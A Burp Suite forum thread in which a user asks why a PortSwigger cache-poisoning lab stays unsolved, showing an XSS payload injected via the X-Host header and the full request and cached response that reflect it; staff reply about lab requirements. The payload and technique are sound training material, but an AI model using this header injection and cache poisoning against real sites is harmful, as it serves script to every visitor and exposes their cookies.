Burp Suite User Forum

Login to post

Lab: Targeted web cache poisoning using an unknown header

Mameluke | Last updated: Nov 19, 2020 07:27PM UTC

I was trying to solve this lab by injecting the 'alert(document.cookie)' directly in the X-Host header as: 'X-Host: domain"></script><script>alert(document.cookie);</script>' and it was working, it was executing the alert in browser, but the lab won't solved. Checking the solution I see it should be done by pointing to the exploit server and loading the js from there. Is there any reason for my solution to not be valid? Haven't I comply with all of the requirements?

Ben, PortSwigger Agent | Last updated: Nov 23, 2020 08:42AM UTC

Hi, The requirements of this lab are that you need to poison the cache so that a victim visitor executes the alert(document.cookie) so need to use the Exploit Server to achieve this. Executing the alert in your own browser will not solve the lab.

Mameluke | Last updated: Nov 24, 2020 12:03PM UTC

Hi Ben, Sorry but I didn't find the Exploit Server necessary to achieve this. It is necessary in order to obtain the victim User-Agent but not for the poison part. Instead of doing the lab solution, setting the X-Host with: your-exploit-server-id.web-security-academy.net, then creating '/resources/js/tracking.js' with 'alert(document.cookie)' etc etc... What I did was to directly poison the X-Host header with 'X-Host: domain"></script><script>alert(document.cookie);</script>', this will reflect directly in the source code as '<script type="text/javascript" src="//domain"></script><script>alert(document.cookie);</script>/resources/js/tracking.js"></script>', the tracking.js will be ignored and the alert triggered both in my browser and the victim browser as it is cached. I'll paste the full trace below. I wish I could add screenshots as well but I can't. ---------------------------------------------------------------- GET / HTTP/1.1 Host: acfa1ff51f965e9b8048a29d000200be.web-security-academy.net X-Host: domain"></script><script>alert(document.cookie);</script> Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Vary: User-Agent Connection: close Cache-Control: max-age=30 Age: 2 X-Cache: hit X-XSS-Protection: 0 Content-Length: 7618 <!DOCTYPE html> <html> <head> <link href=/resources/css/academyLabHeader.css rel=stylesheet> <link href=/resources/css/labsBlog.css rel=stylesheet> <title>Targeted web cache poisoning using an unknown header</title> </head> <body> <script type="text/javascript" src="//domain"></script><script>alert(document.cookie);</script>/resources/js/tracking.js"></script> <script src="/resources/js/labHeader.js"></script> <div id="academyLabHeader">...

Ben, PortSwigger Agent | Last updated: Nov 24, 2020 12:31PM UTC

Hi, To clarify, you are saying that you successfully solved the lab using the above method or that you successfully generated an alert but the lab remains unsolved?

Mameluke | Last updated: Nov 24, 2020 02:54PM UTC

Hi, I didn't get to solve the lab successfully with the above method but I'm trying to understand why or if there is any requirement that that method is not fulfilling. As I understand that it should have been solved with it.

Ben, PortSwigger Agent | Last updated: Nov 26, 2020 12:40PM UTC

Hi, You can send us an email at support@portswigger.net and include screenshots. This might be useful to see exactly the steps that you are taking.

You need to Log in to post a reply. Or register here, for free.